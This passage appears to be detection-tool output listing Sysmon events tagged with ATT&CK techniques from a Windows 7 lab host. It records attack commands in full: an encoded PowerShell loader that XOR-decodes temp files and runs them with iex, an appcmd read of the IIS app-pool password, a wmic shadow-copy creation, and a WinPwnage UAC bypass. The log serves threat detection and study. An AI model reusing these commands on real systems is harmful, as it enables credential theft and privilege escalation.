<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557667978.167195,2019-05-12T17:32:58.167195+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:30:46.556756Z"">
</TimeCreated>
<EventRecordID>16389</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:30:46.275</Data>
<Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
<Data Name=""ProcessId"">2936</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
<Data Name=""ParentProcessId"">2960</Data>
<Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,Low,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:47.402708Z"">
</TimeCreated>
<EventRecordID>6180</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:47.402</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6F-5CEB-0000-0010F4370C00</Data>
<Data Name=""ProcessId"">3448</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969967.478285,2019-05-27T19:12:47.478285+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:47.402708Z"">
</TimeCreated>
<EventRecordID>6180</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:47.402</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6F-5CEB-0000-0010F4370C00</Data>
<Data Name=""ProcessId"">3448</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create &quot;ClientAccessible&quot;, &quot;C:\&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FD85-5CEB-0000-00104C0E0B00</Data>
<Data Name=""ParentProcessId"">1944</Data>
<Data Name=""ParentImage"">C:\Windows\System32\notepad.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\notepad.exe&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1558452779.769825,2019-05-21T19:32:59.769825+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( gator4243.hostgator.com ) , IP ( 108.179.232.58 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:59.389278Z"">
</TimeCreated>
<EventRecordID>4128</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3628"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 06:58:39.888</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-001079F92101</Data>
<Data Name=""ProcessId"">2432</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7..home</Data>
<Data Name=""SourcePort"">49703</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">108.179.232.58</Data>
<Data Name=""DestinationHostname"">gator4243.hostgator.com</Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556664747.588976,2019-05-01T02:52:27.588976+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-30T22:49:10.198351Z"">
</TimeCreated>
<EventRecordID>10153</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1936"" ThreadID=""1644"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-30 22:49:09.276</Data>
<Data Name=""ProcessGuid"">365ABB72-D0E5-5CC8-0000-0010DADF3E00</Data>
<Data Name=""ProcessId"">2892</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-C494-5CC8-0000-0020E4FF0000</Data>
<Data Name=""LogonId"">0xffe4</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-D0E4-5CC8-0000-00103CB73E00</Data>
<Data Name=""ParentProcessId"">3680</Data>
<Data Name=""ParentImage"">C:\Windows\Installer\MSI4FFD.tmp</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\Installer\MSI4FFD.tmp&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.742817,2019-05-27T05:29:18.742817+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;. )&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.742817Z"">
</TimeCreated>
<EventRecordID>5934</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.702</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-0010AFA2FF00</Data>
<Data Name=""ProcessId"">3812</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;. )&quot; /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557667846.556756,2019-05-12T17:30:46.556756+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:30:46.400506Z"">
</TimeCreated>
<EventRecordID>16388</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""1996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:30:46.213</Data>
<Data Name=""ProcessGuid"">365ABB72-2006-5CD8-0000-0010A2862300</Data>
<Data Name=""ProcessId"">2960</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url</Data>
<Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
<Data Name=""LogonId"">0x13a10</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1FF8-5CD8-0000-00102A342000</Data>
<Data Name=""ParentProcessId"">1332</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
